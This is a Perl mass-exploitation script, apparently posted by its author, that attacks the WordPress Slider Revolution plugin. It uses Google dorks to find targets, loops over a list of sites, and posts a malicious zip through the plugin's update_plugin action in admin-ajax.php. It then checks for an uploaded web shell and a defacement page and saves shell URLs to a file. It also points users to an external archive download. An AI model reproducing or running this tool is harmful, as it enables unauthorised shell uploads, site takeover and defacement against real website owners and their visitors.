Revslider Auto Exploiter

1. #!/usr/bin/perl
2. #  
3. #  Dork 1: inurl:/wp-content/plugins/revslider/
4. #  Dork 2: inurl:/wp-admin/admin-ajax.php
5. #
6. #  
7. #
8. #  Don't Change right Noobs Oky #Oussama911 :3
9. #  +------------------------------------------------------------------------------------------------+
10. #  |  Warning : Download This Archive .zip and past in folder Bin of Perl for Use this Script !!!!  |
11. #  |  Link : http://www.gulfup.com/?3bDGf4 !!!!                                                        |
12. #  |                                                                                                |
13. #  +------------------------------------------------------------------------------------------------+
14. #
15. # -> Title: Auto Exploiter Slider Revolution Shell Upload
16. # -> Author: Oussama911
17. #
18.  
19. use LWP::UserAgent;
20.  
21. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
22.  
23. head();
24.  
25. my $usage = " \nperl $0 <list.txt>\n perl $0 lista.txt";
26. die "$usage" unless $ARGV[0];
27.  
28. open(tarrget,"<$ARGV[0]") or die "$!";
29. while(<tarrget>){
30. chomp($_);
31. $target = $_;
32.  
33. my $path = "wp-admin/admin-ajax.php";
34.  
35. print "\nTarget => $target\n";
36.  
37. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
38. $ua->timeout(10);
39. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
40. my $req = $ua->get("$target/$path");
41. if($req->is_success) {
42. print "\n  [+] Xploit Possibility Work :3\n \n";
43.  
44.  
45.  
46. print "  [*] Try Exploiting Vulnerability\n";
47. print "  [*] Xploiting $target\n";
48.  
49. my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);
50.  
51. print "  [*] Sent payload\n";
52.  
53. if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
54. print "  [+] Payload successfully executed\n";
55.  
56. print "  [*] Checking if shell was uploaded\n";
57. my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/up.php")->content;
58. if($check =~/<br>/) {
59.  
60.     print "  [+] Shell successfully uploaded\n";
61.     open(save, '>>Shells.txt');
62.     print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/up.php?zeb\n";
63.     close(save);
64.  
65.  
66. print "  [*] Checking if Deface was uploaded now\n";
67.  
68. my $def = $ua->get("$target/leet.html")->content;
69. if($def = ~/Hacked/) {
70.  
71. print "  [+] Deface uploaded successfull\n";
72.  
73.  
74. } else {print "   [-] Deface not Uploaded :/"; }
75. } else { print "  [-] I'think Shell Not Uploaded :/\n"; }
76. } else {
77. print "  [-] Payload failed: Fail\n";
78. print "\n";
79.  
80. }
81. } else { print "\n [-]Xploit Fail \n"}
82.  
83. sub head {
84. print "\t   +===============================================\n";
85. print "\t   | Auto Exploiter Revslider Shell Upload \n";
86. print "\t   | Author: Oussama911\n";
87. print "\t   +===============================================\n";
88. }
89. }